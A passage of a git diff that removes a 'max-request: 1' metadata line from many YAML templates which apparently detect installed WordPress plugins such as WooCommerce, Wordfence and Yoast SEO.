--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
-    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 7543ac1d55..46c1c22805 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 4a29cecdb0..7c13b8d2a4 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
-    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index be281d91e6..53b30ba721 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
-    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 41baa25eb7..dc3d446af3 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
-    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index ee389af6ec..96b4699d2d 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
-    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 1bb9a283ce..17584cd064 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
-    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 7836d9554c..015fb97043 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
-    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index ccd72e427a..1d5224b457 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index 3622b2c6b3..aafd6c6a38 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
-    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index 9eff765d61..e10ab985da 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
-    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index c856e1fa9e..9881b591ae 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
-    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 008440cc58..0480b4b0e6 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
-    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 410776862f..26d525386b 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
-    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index f210a2a2f9..3920c5cf56 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
-    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f1dd1bf150..f556786f5a 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
-    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index a9ec913599..844e3d19a0 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
-    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index d38aeb0279..eb0f02f602 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
-    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 07c43b9d80..755efd53fa 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
-    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 83a849e11e..0403bb4e72 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
-    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index c6100637d9..cd2632ea05 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
-    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index 1f188b66c6..b5f8b822c7 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
-    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 2c7b16cb44..85aaf7ff16 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
-    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 9d6afa8d3f..0af322b728 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index 87721a245a..d4ac0d179e 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
-    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index 45e0dead0e..dbbadf3cfc 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
-    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index abec174ec3..401b0e479f 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
-    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index e088ac07a6..6f95506748 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
-    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 8b163200bf..4404f87aab 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
-    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 2366a7dad7..8995434fce 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
-    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 71448e61e8..8175806cb8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
-    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index 717554b89f..db82bc7f43 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
-    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index fba5c8b09c..03ddae57bc 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
-    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index 631202198e..d6449bb5bf 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
-    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index cc953078eb..2d5fdf1779 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
-    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 97ce674116..6b5705e20d 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
-    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index 6d05a6f058..dbcdb64bad 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index baf5af3bb5..fb9ea502ce 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index aa1898c4ba..48ffb25245 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 5fae796fdd..4fa6fc3ffe 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 22f812e2b8..1c1c690fcd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index c637006d26..4d6702d81a 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index e020507ccb..42cb8bc409 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index c92903fd79..55d6effbf5 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
-    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index c25b2c1c48..6786cab703 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 4d6dd14d25..784ba22c8a 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 7ca0870ed6..72ff55e58a 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
-    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 4f0d9be568..8cfaa0f5a9 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index f3c481b824..85900a01a7 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
-    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index ba214fd7ea..a7ccde0b49 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
-    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 8f5fe8d9a5..422664a98c 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index 0458b13354..f0af3a748a 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
-    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index d570be07bf..f89f1a20b3 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,7 +7,6 @@ info:
